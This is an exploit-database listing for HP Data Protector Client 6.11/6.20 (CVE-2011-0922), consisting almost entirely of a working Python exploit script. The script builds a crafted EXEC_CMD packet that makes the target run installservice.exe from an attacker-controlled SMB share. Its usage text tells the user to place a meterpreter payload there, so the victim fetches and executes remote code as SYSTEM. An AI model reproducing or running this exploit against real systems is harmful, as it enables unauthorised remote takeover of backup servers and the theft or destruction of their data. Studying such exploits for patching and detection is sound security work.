HP Data Protector Client 6.11 / 6.20 Remote Code Execution

2012-06-20T00:00:00
ID PACKETSTORM:113919
Type packetstorm
Reporter Ben Turner
Modified 2012-06-20T00:00:00

Description

                                        
                                            `#!/usr/bin/env python  
  
# Exploit Title: HP Data Protector Client EXEC_CMD Remote Code Execution Vulnerability  
# Date: 2012-12-06  
# Exploit Author: Ben Turner  
# Vendor Homepage: www.hp.com  
# Version: 6.11 & 6.20  
# Tested on: Windows 2003 Server SP2 en  
# CVE: CVE-2011-0922  
# Notes: ZDI-11-056  
# Reference: http://www.zerodayinitiative.com/advisories/ZDI-11-056/  
# Reference: http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02781143  
  
  
import socket  
import sys  
import binascii  
  
if len(sys.argv) != 4:  
print ""  
print "\033[0;31mUsage: ./hp_protector.py <Target IP> <Port> <Reverse IP> \033[0m"  
print ""  
print "\033[0;32mMake sure you create a meterpreter payload and a share with the following \\\\<Reverse IP>\\Omniback\\i386\\installservice.exe\033[0m"  
print "\033[0;32mAlso make sure the SYSTEM account on windows can access your share, this is not always trivial\033[0m"  
print ""  
sys.exit(1)  
host = sys.argv[1]  
port = int(sys.argv[2])  
lhost = sys.argv[3]  
  
# Create a Share with the following:  
# Ensure you can access that share with the SYSTEM account on a machine -  
#  
# \\ipaddress\Omniback\i386\installservice.exe  
  
  
b = ''  
  
for char in lhost:  
a = "\x00"+char  
b = b + a  
  
#print b  
  
  
payload = ("\x00\x00\x01\xbe\xff\xfe\x32\x00\x00\x00\x20"  
+ b +  
"\x00\x00\x00\x20\x00\x30\x00"  
"\x00\x00\x20\x00\x53\x00\x59\x00\x53\x00\x54\x00\x45\x00\x4d\x00"  
"\x00\x00\x20\x00\x4e\x00\x54\x00\x20\x00\x41\x00\x55\x00\x54\x00"  
"\x48\x00\x4f\x00\x52\x00\x49\x00\x54\x00\x59\x00\x00\x00\x20\x00"  
"\x43\x00\x00\x00\x20\x00\x32\x00\x36\x00\x00\x00\x20\x00\x5c\x00"  
"\x5c"  
+ b +  
"\x00\x5c\x00\x4f\x00\x6d\x00\x6e\x00\x69\x00\x62\x00"  
"\x61\x00\x63\x00\x6b\x00\x5c\x00\x69\x00\x33\x00\x38\x00\x36\x00"  
"\x5c\x00\x69\x00\x6e\x00\x73\x00\x74\x00\x61\x00\x6c\x00\x6c\x00"  
"\x73\x00\x65\x00\x72\x00\x76\x00\x69\x00\x63\x00\x65\x00\x2e\x00"  
"\x65\x00\x78\x00\x65\x00\x20\x00\x2d\x00\x73\x00\x6f\x00\x75\x00"  
"\x72\x00\x63\x00\x65\x00\x20\x4f\x00\x6d\x00\x6e\x00\x69\x00\x62"  
"\x00\x61\x00\x63\x00\x6b\x00\x20\x00\x5c\x00\x5c"  
+ b +  
"\x5c\x00\x5c\x00\x4f\x00"  
"\x6d\x00\x6e\x00\x69\x00\x62\x00\x61\x00\x63\x00\x6b\x00\x5c\x00"  
"\x69\x00\x33\x00\x38\x00\x36\x00\x5c\x00\x69\x00\x6e\x00\x73\x00"  
"\x74\x00\x61\x00\x6c\x00\x6c\x00\x73\x00\x65\x00\x72\x00\x76\x00"  
"\x69\x00\x63\x00\x65\x00\x2e\x00\x65\x00\x78\x00\x65\x00\x20\x00"  
"\x2d\x00\x73\x00\x6f\x00\x75\x00\x72\x00\x63\x00\x65\x00\x20\x00"  
"\x5c\x00\x5c"  
+ b +  
"\x00\x5c\x00\x4f\x00\x6d\x00\x6e\x00\x69\x00\x62\x00\x61\x00\x63"  
"\x00\x6b\x00\x20\x00\x00\x00\x00\x00\x00\x00\x02\x54"  
"\xff\xfe\x32\x00\x36\x00\x00\x00\x20\x00\x5b\x00\x30\x00\x5d\x00"  
"\x41\x00\x44\x00\x44\x00\x2f\x00\x55\x00\x50\x00\x47\x00\x52\x00"  
"\x41\x00\x44\x00\x45\x00\x0a\x00\x5c\x00\x5c"  
+ b +  
"\x00\x5c\x00\x4f\x00\x6d\x00\x6e\x00\x69\x00\x62\x00\x61\x00\x63"  
"\x00\x6b\x00\x5c\x00\x69\x00\x33\x00\x38\x00\x36\x00")  
  
print payload  
  
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
s.connect((host, port))  
print "Sending payload"  
s.send(payload)  
while 1:  
data = s.recv(4096)  
if data:  
print data  
else:  
break  
s.close()  
  
`